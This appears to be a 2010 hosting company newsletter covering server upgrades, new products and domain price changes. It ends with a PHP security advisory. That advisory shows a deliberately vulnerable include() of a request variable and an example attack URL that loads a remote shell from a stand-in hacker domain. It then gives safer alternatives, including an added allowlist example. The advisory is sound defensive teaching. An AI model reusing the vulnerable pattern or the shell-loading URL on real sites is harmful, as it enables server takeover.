
Autumn 2010

Greetings and welcome to the Autumn 2010 edition of Nexology. This newsletter is a round-up of things happening at HostNexus and will probably go out 4 times a year (next edition will be Winter 2010). It's been busy as usual at HN with a lot happening behind the scenes and lots more to come!

Hoping everyone north of the equator had a great summer! We wish our Antipodean clients an awesome summer too!

- Laurence, HostNexus

A Brief Round-Up

Plesk 9.5 for Windows - We have started upgrading our fleet of Windows servers to Plesk 9.5. Most Linux shared/reseller servers already have this but Plesk upgrades on Windows servers aren't as easy. The first one on Baryon went well, but the Neutron upgrade took longer than expected and had various issues. We will take what we've learned so far and continue on. If any Managed Server client would like the upgrade please schedule it with our support team.

ColdFusion 9 - So far we've only deployed CF 9 on CF Linux server Atom. The CF 9 upgrade on Linux is possible but not without issues. We have yet to figure out how to migrate MySQL 3 type DSNs from CF 8 to CF 9. On Windows the problems are larger as the upgrade wipes any DSNs created from Plesk. However, I'm told that CF 9 support is coming in Plesk 9.5.3 so all the more reason to press on with those Plesk 9 upgrades.

MailEnable Pro - MailEnable Pro was installed on Boson with its IMAP support. Baryon is scheduled for this upgrade in a few weeks so clients on that server hold tight for that.

New Root Exploit - A nasty root exploit was discovered earlier this month that caused huge ripples throughout the Linux community. A fix was offered which we implemented right away. It caused some issues with FrontPage on a few servers but that should be fixed now. If anyone has non-functioning FrontPage sites just reinstall the extensions by updating the FP password in Plesk. Don't hesitate to contact Support if you need help. A new kernel fixing the issue was released and we installed it on all servers (including managed dedicated servers).



NEW: cPanel Now Available!

If you've looked at our home page recently you'll see we are now providing Shared and Reseller Hosting on the popular cPanel platform. On cPanel we have the Fantastico and Softaculous one-click installers plus the popular RvSkin and free RvSiteBuilder for everyone. We used to offer cPanel on another brand called ResellerNexus and we have always offered it on VPS and dedicated hosting but this is a first for the HostNexus brand and we are very excited about it. Details are up on this page

NEW: Updated Dedicated Server Line

After a great year we've phased out the old Core2Duo/Core2Quad line. We are now offering the newer Core i3 and Core i7 servers plus a new line of powerful Dual Processor Xeon servers. Check out the Dedicated Server page if you want to take your site to the next level with a fully managed dedicated server of your own. We are now up to 6 cores per proc - go Intel!

HostNexus Now On Facebook

We now have a FanPage on Facebook. Please check it out, leave comments on our wall, post reviews and tell your friends. We hope you "like" it!

Blog Post: How To Bulk Unfollow On Twitter in Minutes

Have you ever wanted to clean out your Twitter account? Ever feel the need to exterminate all the auto-follow spammers following 97,000 people? Maybe you have, and then maybe you found that Twitter does not make it easy for you to bulk unfollow hundreds, or indeed thousands of people. This was the case with me and I went on a crusade to solve the problem. And solve it I did. Read the blog post for the full story and a few laughs.

Introducing the new NexusDomains

We have given NexusDomains a long overdue facelift. The new site you see is Enom's new Instant Reseller product that is phasing out the old PDQ system. Unfortunately it is a lot more expensive than PDQ at $249.95/yr but I think you'll agree it is leagues ahead of PDQ in layout, design and functionality. The customisable options are very nice indeed. So if you want a completely automated domain business and you can absorb the cost, I highly recommend upgrading to Instant Reseller. Visit NexusDomains today.

Price Increase From Verisign (yet again)

It's that time of year again and Verisign has increased prices for all .com domains by $0.50. This is in fact the third such increase from Verisign as they raise it each year but until now we've always absorbed the costs, wanting to give our clients the best possible pricing on .com domains. With this year's increase we do have to do something though so we have passed this increase along to our Domain Resellers. Retail customers will still be able to register .com domains at NexusDomains for the usual $12.95/yr but the base price for Domain Resellers has risen from $8.95 to $9.45. Please see the announcement on our forum.

PHP Security and YOU - Including files the right way

As a web host we fight the battle against hackers and bad code on a daily basis. So HostNexus is looking to encourage clients to use file inclusion within PHP in a more security conscious and safe manner.

Including files with PHP is a common practice and most usage comes in 2 forms. These are including internal files from your own domain and including files from remote (external) sources. This looks something like:


Internal:

<?php
include("http://www.myowndomain.com/something.txt");
?>


External:

<?php include("http://www.externaldomain.com/something.txt"); ?>

Both are valid syntax in the PHP world but there are two main problems we see on the servers. Sometimes when you include a file using the URL of your local domain you can cause a PHP loop that initiates endless HTTP requests, which causes server load issues and even a server crash due to the load. If you want to include files from your local domain you just need to use the server path instead:

<?php
// Server path: read straight from disk, no HTTP request back to your own site
include('/home/httpd/vhosts/myowndomain.com/httpdocs/something.txt');
?>


And now onto using include() for calling external files:

<?php
include("http://www.externaldomain.com/something.txt");
?>


The main problem with include() is that it runs everything through the PHP parser and evaluates code. The danger comes from passing a variable to include(), which can be easily exploited. Here is an example of code in an index.php:

<?php
echo "<html>\n";
echo " <body>\n";
// $go is filled in from the request, so the visitor decides what gets included
include("$go");
echo " </body>\n";
echo "</html>\n";
?>


The $go variable above is easily exploited like:

http://myowndomain.com/index.php?go=http://www.hackerdomain.com/shell.txt

The hacker can now execute commands on your files, installing phishing sites, sending spam and stealing data.

If you want to include files from remote domains use PHP's readfile() function instead:

http://www.php.net/manual/en/function.readfile.php

While not 100% secure it still provides more protection as readfile() simply outputs data to a browser rather than parsing everything as PHP.

I emailed about this issue in a recent NewsFlash and the blog post has been up for quite some time. We will be setting allow_url_include to off on all servers from August 1st so please check your code if you use includes and make the easy changes.
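A hardened version of the index.php above, as an added example that is not HostNexus code: the request value is only used as a key into a fixed list of local files, so a URL in ?go= is never passed to include(). It assumes PHP 7.1 or later; the pages directory and the names PAGES_DIR, PAGES and resolve_page() are hypothetical.

```php
<?php
// Added example, not HostNexus code. Assumes PHP 7.1+.
// PAGES_DIR, PAGES and resolve_page() are hypothetical names.

// Directory holding the fragments index.php may include (assumed layout).
const PAGES_DIR = '/home/httpd/vhosts/myowndomain.com/httpdocs/pages';

// Allowlist: the only ?go= values that map to a file.
const PAGES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
];

// Return the server path for an allowed page name, or null for anything else.
function resolve_page($go): ?string
{
    if (!is_string($go) || !array_key_exists($go, PAGES)) {
        return null;               // URLs, paths and unknown names all end here
    }
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . PAGES[$go]);
    if ($base === false || $path === false) {
        return null;               // directory or file missing
    }
    // The resolved file must still sit inside PAGES_DIR (guards against symlinks).
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Defence in depth: record it if the server still permits URL includes.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    error_log('allow_url_include is On; remote include() is possible');
}

$path = resolve_page($_GET['go'] ?? 'home');
if ($path === null) {
    http_response_code(404);       // set before any output is sent
}
echo "<html>\n <body>\n";
if ($path === null) {
    echo "Page not found\n";
} else {
    include $path;                 // always a local file picked from the allowlist
}
echo " </body>\n</html>\n";
```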

That's All Folks!


See you all next time.

- Laurence, Head Coffee Maker, HostNexus

HostNexus Copyright © 2001 - 2009. Hostnexus. All Rights Reserved.